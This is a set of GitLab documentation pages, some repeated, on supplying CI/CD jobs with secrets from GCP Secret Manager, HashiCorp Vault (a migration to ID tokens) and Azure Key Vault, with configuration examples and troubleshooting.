For example, for a `gitlab-org/gitlab` branch, the payload is `project_path:gitlab-org/gitlab:ref_type:branch:ref:{branch_name}`. For the string to remain shorter than 127 characters, the branch name must be 76 characters or fewer.

This limit is imposed by Google Cloud IAM, tracked in [Google issue #264362370](https://issuetracker.google.com/issues/264362370?pli=1). The only fix for this issue is to use shorter names [for your branch and repository](https://github.com/google-github-actions/auth/blob/main/docs/TROUBLESHOOTING.md#subject-exceeds-the-127-byte-limit).

### `The secrets provider can not be found. Check your CI/CD variables and try again.` message

You might receive this error when attempting to start a job configured to access GCP Secret Manager:

```plaintext
The secrets provider can not be found. Check your CI/CD variables and try again.
```

The job can't be created because one or more of the required variables are not defined:

- `GCP_PROJECT_NUMBER`
- `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID`
- `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID`

### `WARNING: Not resolved: no resolver that can handle the secret` warning

The Google Cloud Secret Manager integration requires at least GitLab 16.8 and GitLab Runner 16.8. This warning appears if the job is executed by a runner using a version earlier than 16.8.

On GitLab.com, there is a [known issue](https://gitlab.com/gitlab-org/ci-cd/shared-runners/infrastructure/-/issues/176) causing SaaS runners to run an older version. As a workaround until this issue is fixed, you can register your own GitLab Runner with version 16.8 or later.
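The wiring between the CI/CD variables, the token's `aud` URL, and the external identity granted in IAM is just string construction, which can be sketched in Python to check a configuration before touching the console. The project number, pool, provider, and project IDs below are the example values from this page, not real resources.

```python
def wif_audience(project_number: str, pool_id: str, provider_id: str) -> str:
    """Audience URL the job's ID token must carry; it must match the
    audience configured on the WIF provider."""
    return (
        f"https://iam.googleapis.com/projects/{project_number}"
        f"/locations/global/workloadIdentityPools/{pool_id}"
        f"/providers/{provider_id}"
    )


def principal_set(project_number: str, pool_id: str, gitlab_project_id: str) -> str:
    """External identity granted Secret Manager access, keyed by the
    attribute.gitlab_project_id mapping configured on the pool."""
    return (
        f"principalSet://iam.googleapis.com/projects/{project_number}"
        f"/locations/global/workloadIdentityPools/{pool_id}"
        f"/attribute.gitlab_project_id/{gitlab_project_id}"
    )


def qualified_secret_name(project_number: str, secret_name: str) -> str:
    """Fully-qualified name for reading a secret from another GCP project."""
    return f"projects/{project_number}/secrets/{secret_name}"


# Example values from this page: GCP project number 123456789,
# pool `gitlab-pool`, provider `gitlab-provider`, GitLab project ID 20.
print(wif_audience("123456789", "gitlab-pool", "gitlab-provider"))
print(principal_set("123456789", "gitlab-pool", "20"))
print(qualified_secret_name("123456789", "my-project-secret"))
```

A quick check like this catches the most common mistakes: using the project ID where the project number is required, or an `aud` that does not match the provider path.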
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use GCP Secret Manager secrets in GitLab CI/CD
breadcrumbs:
- doc
- ci
- secrets
---

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/11739) in GitLab and GitLab Runner 16.8.

{{< /history >}}

You can use secrets stored in the [Google Cloud (GCP) Secret Manager](https://cloud.google.com/security/products/secret-manager) in your GitLab CI/CD pipelines.

The flow for using GitLab with GCP Secret Manager is:

1. GitLab issues an ID token to the CI/CD job.
1. The runner authenticates to GCP using the ID token.
1. GCP verifies the ID token with GitLab.
1. GCP issues a short-lived access token.
1. The runner accesses the secret data using the access token.
1. GCP checks the IAM secret permission on the access token's principal.
1. GCP returns the secret data to the runner.

To use GitLab with GCP Secret Manager, you must:

- Have secrets stored in [GCP Secret Manager](https://cloud.google.com/security/products/secret-manager).
- Configure [GCP Workload Identity Federation](#configure-gcp-iam-workload-identity-federation-wif) to include GitLab as an identity provider.
- Configure [GCP IAM](#grant-access-to-gcp-iam-principal) permissions to grant access to GCP Secret Manager.
- Configure [GitLab CI/CD with GCP Secret Manager](#configure-gitlab-cicd-to-use-gcp-secret-manager-secrets).

## Configure GCP IAM Workload Identity Federation (WIF)

GCP IAM WIF must be configured to recognize ID tokens issued by GitLab and assign an appropriate principal to them. The principal is used to authorize access to the Secret Manager resources:

1. In the GCP Console, go to **IAM & Admin > Workload Identity Federation**.
1. Select **CREATE POOL** and create a new identity pool with a unique name, for example `gitlab-pool`.
1. Select **ADD PROVIDER** to add a new OIDC provider to the identity pool with a unique name, for example `gitlab-provider`.
1. Set **Issuer (URL)** to the GitLab URL, for example `https://gitlab.com`.
1. Select **Default audience**, or select **Allowed audiences** for a custom audience, which must match the `aud` claim of the GitLab CI/CD ID token.
1. Under **Attribute Mapping**, create the following mappings, where:

   - `attribute.X` is the name of the attribute to include as a claim in the Google token.
   - `assertion.X` is the value to extract from the [GitLab claim](../cloud_services/_index.md#id-token-authentication-for-cloud-services).

   | Attribute (on Google)         | Assertion (from GitLab) |
   |-------------------------------|-------------------------|
   | `google.subject`              | `assertion.sub`         |
   | `attribute.gitlab_project_id` | `assertion.project_id`  |

## Grant access to GCP IAM principal

After setting up WIF, you must grant the WIF principal access to the secrets in Secret Manager:

1. In the GCP Console, go to **Security > Secret Manager**.
1. Select the name of the secret you want to grant access to. The secret's details are displayed.
1. From the **PERMISSIONS** tab, select **GRANT ACCESS** to grant access to the principal set created through the WIF provider. The external identity format is:

   ```plaintext
   principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.gitlab_project_id/GITLAB_PROJECT_ID
   ```

   In this example:

   - `PROJECT_NUMBER`: Your Google Cloud project number (not ID), which can be found in the [project's dashboard](https://console.cloud.google.com/home/dashboard).
   - `POOL_ID`: The ID (not name) of the workload identity pool created in the first section, for example `gitlab-pool`.
   - `GITLAB_PROJECT_ID`: The GitLab project ID found on the [project overview page](../../user/project/working_with_projects.md#find-the-project-id).

1. Assign the role **Secret Manager Secret Accessor**.

## Configure GitLab CI/CD to use GCP Secret Manager secrets

You must [add these CI/CD variables](../variables/_index.md#for-a-project) to provide details about your GCP Secret Manager:

- `GCP_PROJECT_NUMBER`: The GCP [project number](https://cloud.google.com/resource-manager/docs/creating-managing-projects).
- `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID`: The WIF pool ID, for example `gitlab-pool`.
- `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID`: The WIF provider ID, for example `gitlab-provider`.

Then you can use secrets stored in GCP Secret Manager in CI/CD jobs by defining them with the `gcp_secret_manager` keyword:

```yaml
job_using_gcp_sm:
  id_tokens:
    GCP_ID_TOKEN:
      # `aud` must match the audience defined in the WIF Identity Pool.
      aud: https://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID}/providers/${GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID}
  secrets:
    DATABASE_PASSWORD:
      gcp_secret_manager:
        name: my-project-secret  # This is the name of the secret defined in GCP Secret Manager
        version: 1  # optional: defaults to `latest`.
      token: $GCP_ID_TOKEN
```

### Use secrets from a different GCP project

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/37487) in GitLab 17.0.

{{< /history >}}

Secret names in GCP are per-project. By default, the secret named in `gcp_secret_manager:name` is read from the project specified in `GCP_PROJECT_NUMBER`. To read a secret from a different project than the project containing the WIF pool, use the fully-qualified secret name formatted as `projects/<project-number>/secrets/<secret-name>`.
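As a quick sketch, the fully-qualified name is just the project number and secret name joined into that pattern (the values here are illustrative):

```shell
# Compose a fully-qualified Secret Manager name from its parts.
# The project number and secret name are illustrative values.
project_number="123456789"
secret_name="my-project-secret"
printf 'projects/%s/secrets/%s\n' "$project_number" "$secret_name"
```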
For example, if `my-project-secret` is in the GCP project number `123456789`, then you can access the secret with:

```yaml
job_using_gcp_sm:
  # ... as previously configured ...
  secrets:
    DATABASE_PASSWORD:
      gcp_secret_manager:
        name: projects/123456789/secrets/my-project-secret  # fully-qualified name of the secret defined in GCP Secret Manager
        version: 1  # optional: defaults to `latest`.
      token: $GCP_ID_TOKEN
```

## Troubleshooting

### Error: The size of mapped attribute `google.subject` exceeds the 127 bytes limit

Long branch paths can cause a job to fail with this error, because the [`assertion.sub` attribute](id_token_authentication.md#token-payload) becomes longer than 127 characters:

```plaintext
ERROR: Job failed (system failure): resolving secrets: failed to exchange sts token: googleapi: got HTTP response code 400 with body: {"error":"invalid_request","error_description":"The size of mapped attribute google.subject exceeds the 127 bytes limit. Either modify your attribute mapping or the incoming assertion to produce a mapped attribute that is less than 127 bytes."}
```

Long branch paths can be caused by:

- Deeply nested subgroups.
- Long group, repository, or branch names.

For example, for a `gitlab-org/gitlab` branch, the payload is `project_path:gitlab-org/gitlab:ref_type:branch:ref:{branch_name}`. For the string to remain shorter than 127 characters, the branch name must be 76 characters or fewer.

This limit is imposed by Google Cloud IAM, tracked in [Google issue #264362370](https://issuetracker.google.com/issues/264362370?pli=1). The only fix for this issue is to use shorter names [for your branch and repository](https://github.com/google-github-actions/auth/blob/main/docs/TROUBLESHOOTING.md#subject-exceeds-the-127-byte-limit).

### `The secrets provider can not be found. Check your CI/CD variables and try again.` message

You might receive this error when attempting to start a job configured to access GCP Secret Manager:

```plaintext
The secrets provider can not be found. Check your CI/CD variables and try again.
```

The job can't be created because one or more of the required variables are not defined:

- `GCP_PROJECT_NUMBER`
- `GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID`
- `GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID`

### `WARNING: Not resolved: no resolver that can handle the secret` warning

The Google Cloud Secret Manager integration requires at least GitLab 16.8 and GitLab Runner 16.8. This warning appears if the job is executed by a runner using a version earlier than 16.8.

On GitLab.com, there is a [known issue](https://gitlab.com/gitlab-org/ci-cd/shared-runners/infrastructure/-/issues/176) causing SaaS runners to run an older version. As a workaround until this issue is fixed, you can register your own GitLab Runner with version 16.8 or later.
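When debugging these variable and audience problems, it can help to print the exact `aud` value that the three CI/CD variables produce and compare it against the default or allowed audiences configured on the WIF provider. A small shell sketch with illustrative values:

```shell
# Illustrative values — in a real pipeline these come from project CI/CD variables.
GCP_PROJECT_NUMBER="123456789"
GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID="gitlab-pool"
GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID="gitlab-provider"

# The `aud` the job's ID token is issued for; the WIF provider must accept it.
aud="https://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_FEDERATION_POOL_ID}/providers/${GCP_WORKLOAD_IDENTITY_FEDERATION_PROVIDER_ID}"
echo "$aud"
```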
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: 'Tutorial: Update HashiCorp Vault configuration to use ID Tokens'
breadcrumbs:
- doc
- ci
- secrets
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< alert type="note" >}}

Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings.

{{< /alert >}}

This tutorial demonstrates how to convert your existing CI/CD secrets configuration to use [ID tokens](id_token_authentication.md). The `CI_JOB_JWT` variables are deprecated, but updating to ID tokens requires some important configuration changes to work with Vault. If you have more than a handful of jobs, converting everything at once is a daunting task.

There isn't one standard method to migrate to [ID tokens](id_token_authentication.md), so this tutorial includes two variations for how to convert your existing CI/CD secrets. Choose the method that is most appropriate for your use case:

1. Update your Vault configuration:
   - Method A: Migrate JWT roles to the new Vault auth method
     1. [Create a second JWT authentication path in Vault](#create-a-second-jwt-authentication-path-in-vault)
     1. [Recreate roles to use the new authentication path](#recreate-roles-to-use-the-new-authentication-path)
   - Method B: Move the `iss` claim to roles for the migration window
     1. [Add `bound_issuers` claim map to each role](#add-bound_issuers-claim-map-to-each-role)
     1. [Remove `bound_issuers` claim from auth method](#remove-bound_issuers-claim-from-auth-method)
1. [Update your CI/CD Jobs](#update-your-cicd-jobs)

## Prerequisites

This tutorial assumes you are familiar with GitLab CI/CD and Vault.

To follow along, you must have:

- An instance running GitLab 16.0 or later, or be on GitLab.com.
- A Vault server that you are already using.
- CI/CD jobs retrieving secrets from Vault with `CI_JOB_JWT`.

In the following examples, replace:

- `vault.example.com` with the URL of your Vault server.
- `gitlab.example.com` with the URL of your GitLab instance.
- `jwt` or `jwt_v2` with your auth method names.

## Method A: Migrate JWT roles to the new Vault auth method

This method creates a second JWT auth method in parallel to the existing one in use. Afterwards, all Vault roles used for the GitLab integration are recreated in this new auth method.

### Create a second JWT authentication path in Vault

As part of the transition from `CI_JOB_JWT` to ID tokens, you must update the `bound_issuer` in Vault to include `https://`:

```shell
$ vault write auth/jwt/config \
    oidc_discovery_url="https://gitlab.example.com" \
    bound_issuer="https://gitlab.example.com"
```

After you make this change, jobs that use `CI_JOB_JWT` start to fail. You can create multiple authentication paths in Vault, which enable you to transition to ID tokens on a job-by-job basis without disruption.

1. To configure a new authentication path with the name `jwt_v2`, run:

   ```shell
   vault auth enable -path jwt_v2 jwt
   ```

   You can choose a different name, but the rest of these examples assume you used `jwt_v2`, so update the examples as needed.

1. Configure the new authentication path for your instance:

   ```shell
   $ vault write auth/jwt_v2/config \
       oidc_discovery_url="https://gitlab.example.com" \
       bound_issuer="https://gitlab.example.com"
   ```

### Recreate roles to use the new authentication path

Roles are bound to a specific authentication path, so you need to add new roles for each job. The `bound_audiences` parameter for the role is mandatory if the JWT contains an audience, and must match at least one of the associated `aud` claims of the JWT.

1. Recreate the role for staging named `myproject-staging`:

   ```shell
   $ vault write auth/jwt_v2/role/myproject-staging - <<EOF
   {
     "role_type": "jwt",
     "policies": ["myproject-staging"],
     "token_explicit_max_ttl": 60,
     "user_claim": "user_email",
     "bound_audiences": ["https://vault.example.com"],
     "bound_claims": {
       "project_id": "22",
       "ref": "master",
       "ref_type": "branch"
     }
   }
   EOF
   ```

1. Recreate the role for production named `myproject-production`:

   ```shell
   $ vault write auth/jwt_v2/role/myproject-production - <<EOF
   {
     "role_type": "jwt",
     "policies": ["myproject-production"],
     "token_explicit_max_ttl": 60,
     "user_claim": "user_email",
     "bound_audiences": ["https://vault.example.com"],
     "bound_claims_type": "glob",
     "bound_claims": {
       "project_id": "22",
       "ref_protected": "true",
       "ref_type": "branch",
       "ref": "auto-deploy-*"
     }
   }
   EOF
   ```

You only need to update `jwt` to `jwt_v2` in the `vault` command; do not change the `role_type` inside the role.

## Method B: Move the `iss` claim to roles for the migration window

This method doesn't require Vault administrators to create a second JWT auth method and recreate all GitLab-related roles.

### Add `bound_issuers` claim map to each role

Vault doesn't allow multiple `iss` claims on the JWT auth method level, as the [`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) directive on this level only accepts a single value. However, multiple claims can be configured on the role level by using the [`bound_claims`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) map configuration directive.

With this method you can provide Vault with multiple options for the `iss` claim validation. This supports the `https://`-prefixed GitLab instance hostname claim that comes with ID tokens, as well as the old non-prefixed claim.

To add the [`bound_claims`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) configuration to the required roles, run:

```shell
$ vault write auth/jwt/role/myproject-staging - <<EOF
{
  "role_type": "jwt",
  "policies": ["myproject-staging"],
  "token_explicit_max_ttl": 60,
  "user_claim": "user_email",
  "bound_audiences": ["https://vault.example.com"],
  "bound_claims": {
    "iss": [
      "https://gitlab.example.com",
      "gitlab.example.com"
    ],
    "project_id": "22",
    "ref": "master",
    "ref_type": "branch"
  }
}
EOF
```

You do not need to alter any existing role configurations except for the `bound_claims` section. Make sure to add the `iss` configuration as shown previously, to ensure Vault accepts the prefixed and non-prefixed `iss` claim for this role.

You must apply this change to all JWT roles used for the GitLab integration before moving on to the next step. After all projects have been migrated and you no longer need parallel support for `CI_JOB_JWT` and ID tokens, you can revert the migration of the `iss` claim validation from the auth method to the roles if desired.

### Remove `bound_issuers` claim from auth method

After all roles have been updated with the `bound_claims.iss` claims, you can remove the auth method level configuration for this validation:

```shell
$ vault write auth/jwt/config \
    oidc_discovery_url="https://gitlab.example.com" \
    bound_issuer=""
```

Setting the `bound_issuer` directive to an empty string removes the issuer validation on the auth method level. However, because this validation has moved to the role level, the configuration is still secure.

## Update your CI/CD Jobs

Vault has two different [KV Secrets Engines](https://developer.hashicorp.com/vault/docs/secrets/kv), and the version you are using impacts how you define secrets in CI/CD. See the [Which Version is my Vault KV Mount?](https://support.hashicorp.com/hc/en-us/articles/4404288741139-Which-Version-is-my-Vault-KV-Mount) article on HashiCorp's support portal to determine which version your Vault server uses.

Also, if needed you can review the CI/CD documentation for:

- [`secrets:`](../yaml/_index.md#secrets)
- [`id_tokens:`](../yaml/_index.md#id_tokens)

The following examples show how to obtain the staging database password written to the `password` field in `secret/myproject/staging/db`.

The value for the `VAULT_AUTH_PATH` variable depends on the migration method you used:

- Method A (Migrate JWT roles to the new Vault auth method): Use `jwt_v2`.
- Method B (Move `iss` claim to roles for migration window): Use `jwt`.

### KV Secrets Engine v1

The [`secrets:vault`](../yaml/_index.md#secretsvault) keyword defaults to v2 of the KV Mount, so you need to explicitly configure the job to use the v1 engine:

```yaml
job:
  variables:
    VAULT_SERVER_URL: https://vault.example.com
    VAULT_AUTH_PATH: jwt_v2  # or "jwt" if you used method B
    VAULT_AUTH_ROLE: myproject-staging
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    PASSWORD:
      vault:
        engine:
          name: kv-v1
          path: secret
        field: password
        path: myproject/staging/db
      file: false
```

Both `VAULT_SERVER_URL` and `VAULT_AUTH_PATH` can be [defined as project or group CI/CD variables](../variables/_index.md#define-a-cicd-variable-in-the-ui), if preferred.

We use [`secrets:file:false`](../yaml/_index.md#secretsfile) because ID tokens place secrets in a file by default, but we need it to work as a regular variable to match the old behavior.

### KV Secrets Engine v2

There are two formats you can use for the v2 engine.

Long format:

```yaml
job:
  variables:
    VAULT_SERVER_URL: https://vault.example.com
    VAULT_AUTH_PATH: jwt_v2  # or "jwt" if you used method B
    VAULT_AUTH_ROLE: myproject-staging
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    PASSWORD:
      vault:
        engine:
          name: kv-v2
          path: secret
        field: password
        path: myproject/staging/db
      file: false
```

This is the same as the example for the v1 engine, but `secrets:vault:engine:name:` is set to `kv-v2` to match the engine.

You can also use a short format:

```yaml
job:
  variables:
    VAULT_SERVER_URL: https://vault.example.com
    VAULT_AUTH_PATH: jwt_v2  # or "jwt" if you used method B
    VAULT_AUTH_ROLE: myproject-staging
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    PASSWORD:
      vault: myproject/staging/db/password@secret
      file: false
```

After you commit the updated CI/CD configuration, your jobs fetch secrets with ID tokens. Congratulations!

If you have migrated all projects to fetch secrets with ID tokens and used method B for the migration, you can now move the `iss` claim validation back to the auth method configuration if you desire.
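As a reference for the short format, the string `<path>/<field>@<mount>` carries the same information as the long format's `engine:path`, `path`, and `field` keys. A shell sketch of how the pieces map (the parsing here is illustrative, not how GitLab implements it):

```shell
# Split the short-format secret reference into the long-format fields.
secret="myproject/staging/db/password@secret"

mount="${secret##*@}"          # engine path: "secret"
path_and_field="${secret%@*}"  # "myproject/staging/db/password"
field="${path_and_field##*/}"  # field: "password"
path="${path_and_field%/*}"    # secret path: "myproject/staging/db"

echo "engine path: $mount"
echo "path: $path"
echo "field: $field"
```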
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use Azure Key Vault secrets in GitLab CI/CD
breadcrumbs:
- doc
- ci
- secrets
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/271271) in GitLab and GitLab Runner 16.3. Due to [issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746), this feature did not work as expected.
- [Issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) resolved and this feature made generally available in GitLab Runner 16.6.

{{< /history >}}

You can use secrets stored in [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault/) in your GitLab CI/CD pipelines.

Prerequisites:

- Have a [Key Vault](https://learn.microsoft.com/en-us/azure/key-vault/general/quick-create-portal) on Azure.
- Your IAM user must be [granted the **Key Vault Administrator** role assignment](https://learn.microsoft.com/en-us/azure/role-based-access-control/quickstart-assign-role-user-portal#grant-access) for the **resource group** assigned to the Key Vault. Otherwise, you can't create secrets inside the Key Vault.
- [Configure OpenID Connect in Azure to retrieve temporary credentials](../cloud_services/azure/_index.md). These steps include instructions on how to create an Azure AD application for Key Vault access.
- Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your Key Vault server:
  - `AZURE_KEY_VAULT_SERVER_URL`: The URL of your Azure Key Vault server, such as `https://vault.example.com`.
  - `AZURE_CLIENT_ID`: The client ID of the Azure application.
  - `AZURE_TENANT_ID`: The tenant ID of the Azure application.

## Use Azure Key Vault secrets in a CI/CD job

You can use a secret stored in your Azure Key Vault in a job by defining it with the [`azure_key_vault`](../yaml/_index.md#secretsazure_key_vault) keyword:

```yaml
job:
  id_tokens:
    AZURE_JWT:
      aud: 'https://gitlab.com'
  secrets:
    DATABASE_PASSWORD:
      token: $AZURE_JWT
      azure_key_vault:
        name: 'test'
        version: '00000000000000000000000000000000'
```

In this example:

- `aud` is the audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/azure/_index.md#create-azure-ad-federated-identity-credentials).
- `name` is the name of the secret in Azure Key Vault.
- `version` is the version of the secret in Azure Key Vault. The version is a generated GUID without dashes, which can be found on the Azure Key Vault secrets page.
- GitLab fetches the secret from Azure Key Vault and stores the value in a temporary file. The path to this file is stored in a `DATABASE_PASSWORD` CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables).

## Troubleshooting

Refer to [OIDC for Azure troubleshooting](../cloud_services/azure/_index.md#troubleshooting) for general problems when setting up OIDC with Azure.

### `JWT token is invalid or malformed` message

You might receive this error when fetching secrets from Azure Key Vault:

```plaintext
RESPONSE 400 Bad Request
AADSTS50027: JWT token is invalid or malformed.
```

This occurs due to a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) in GitLab Runner where the JWT token isn't parsed correctly. To resolve this, upgrade to GitLab Runner 16.6 or later.

### `Caller is not authorized to perform action on resource` message

You might receive this error when fetching secrets from Azure Key Vault:

```plaintext
RESPONSE 403: 403 Forbidden
ERROR CODE: Forbidden
Caller is not authorized to perform action on resource.\r\nIf role assignments, deny assignments or role definitions were changed recently, please observe propagation time. ForbiddenByRbac
```

If your Azure Key Vault is using RBAC, you must add the **Key Vault Secrets User** role assignment to your Azure AD application.

For example:

```shell
appId=$(az ad app list --display-name gitlab-oidc --query '[0].appId' -otsv)
az role assignment create --assignee $appId --role "Key Vault Secrets User" --scope /subscriptions/<subscription-id>
```

You can find your subscription ID in:

- The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription).
- The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription).

### `The secrets provider can not be found. Check your CI/CD variables and try again.` message

You might receive this error when attempting to start a job configured to access Azure Key Vault:

```plaintext
The secrets provider can not be found. Check your CI/CD variables and try again.
```

The job can't be created because one or more of the required variables are not defined:

- `AZURE_KEY_VAULT_SERVER_URL`
- `AZURE_CLIENT_ID`
- `AZURE_TENANT_ID`
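As with the other secrets integrations, a quick way to rule out the undefined-variable case is to check each variable explicitly before relying on the job. A small shell sketch (the values below are illustrative placeholders, not real credentials):

```shell
# Fail fast when a required variable is empty. In CI these values come
# from project CI/CD variables; the placeholders below are illustrative.
AZURE_KEY_VAULT_SERVER_URL="https://vault.example.com"
AZURE_CLIENT_ID="00000000-0000-0000-0000-000000000000"
AZURE_TENANT_ID="11111111-1111-1111-1111-111111111111"

status=0
for pair in \
  "AZURE_KEY_VAULT_SERVER_URL=$AZURE_KEY_VAULT_SERVER_URL" \
  "AZURE_CLIENT_ID=$AZURE_CLIENT_ID" \
  "AZURE_TENANT_ID=$AZURE_TENANT_ID"; do
  name="${pair%%=*}"
  value="${pair#*=}"
  if [ -z "$value" ]; then
    echo "Missing required CI/CD variable: $name" >&2
    status=1
  fi
done
[ "$status" -eq 0 ] && echo "All Azure Key Vault variables are set"
```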
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Use Azure Key Vault secrets in GitLab CI/CD
breadcrumbs:
  - doc
  - ci
  - secrets
---

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/271271) in GitLab and GitLab Runner 16.3. Due to [issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) this feature did not work as expected.
- [Issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) resolved and this feature made generally available in GitLab Runner 16.6.

{{< /history >}}

You can use secrets stored in the [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault/) in your GitLab CI/CD pipelines.

Prerequisites:

- Have a [Key Vault](https://learn.microsoft.com/en-us/azure/key-vault/general/quick-create-portal) on Azure.
- Your IAM user must be [granted the **Key Vault Administrator** role assignment](https://learn.microsoft.com/en-us/azure/role-based-access-control/quickstart-assign-role-user-portal#grant-access) for the **resource group** assigned to the Key Vault. Otherwise, you can't create secrets inside the Key Vault.
- [Configure OpenID Connect in Azure to retrieve temporary credentials](../cloud_services/azure/_index.md). These steps include instructions on how to create an Azure AD application for Key Vault access.
- Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your Vault server:
  - `AZURE_KEY_VAULT_SERVER_URL`: The URL of your Azure Key Vault server, such as `https://vault.example.com`.
  - `AZURE_CLIENT_ID`: The client ID of the Azure application.
  - `AZURE_TENANT_ID`: The tenant ID of the Azure application.
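If you configured OIDC with the Azure CLI, you can look up the values for these variables from the command line. This is a sketch that assumes your Azure AD application is named `gitlab-oidc` (the name used in the troubleshooting examples later on this page) and that you are signed in with `az login`; replace `<vault-name>` with the name of your Key Vault:

```shell
# Client ID of the Azure AD application (value for AZURE_CLIENT_ID)
az ad app list --display-name gitlab-oidc --query '[0].appId' -otsv

# Tenant ID of your Azure subscription (value for AZURE_TENANT_ID)
az account show --query tenantId -otsv

# Vault URI of your Key Vault (value for AZURE_KEY_VAULT_SERVER_URL)
az keyvault show --name <vault-name> --query properties.vaultUri -otsv
```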
## Use Azure Key Vault secrets in a CI/CD job

You can use a secret stored in your Azure Key Vault in a job by defining it with the [`azure_key_vault`](../yaml/_index.md#secretsazure_key_vault) keyword:

```yaml
job:
  id_tokens:
    AZURE_JWT:
      aud: 'https://gitlab.com'
  secrets:
    DATABASE_PASSWORD:
      token: $AZURE_JWT
      azure_key_vault:
        name: 'test'
        version: '00000000000000000000000000000000'
```

In this example:

- `aud` is the audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/azure/_index.md#create-azure-ad-federated-identity-credentials).
- `name` is the name of the secret in Azure Key Vault.
- `version` is the version of the secret in Azure Key Vault. The version is a generated GUID without dashes, which can be found on the Azure Key Vault secrets page.
- GitLab fetches the secret from Azure Key Vault and stores the value in a temporary file. The path to this file is stored in a `DATABASE_PASSWORD` CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables).

## Troubleshooting

Refer to [OIDC for Azure troubleshooting](../cloud_services/azure/_index.md#troubleshooting) for general problems when setting up OIDC with Azure.

### `JWT token is invalid or malformed` message

You might receive this error when fetching secrets from Azure Key Vault:

```plaintext
RESPONSE 400 Bad Request
AADSTS50027: JWT token is invalid or malformed.
```

This occurs due to a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) in GitLab Runner where the JWT token isn't parsed correctly. To resolve this, upgrade to GitLab Runner 16.6 or later.
### `Caller is not authorized to perform action on resource` message

You might receive this error when fetching secrets from Azure Key Vault:

```plaintext
RESPONSE 403: 403 Forbidden
ERROR CODE: Forbidden

Caller is not authorized to perform action on resource.\r\nIf role assignments, deny assignments or role definitions were changed recently, please observe propagation time.
ForbiddenByRbac
```

If your Azure Key Vault is using RBAC, you must add the **Key Vault Secrets User** role assignment to your Azure AD application.

For example:

```shell
appId=$(az ad app list --display-name gitlab-oidc --query '[0].appId' -otsv)
az role assignment create --assignee $appId --role "Key Vault Secrets User" --scope /subscriptions/<subscription-id>
```

You can find your subscription ID in:

- The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription).
- The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription).

### `The secrets provider can not be found. Check your CI/CD variables and try again.` message

You might receive this error when attempting to start a job configured to access Azure Key Vault:

```plaintext
The secrets provider can not be found. Check your CI/CD variables and try again.
```

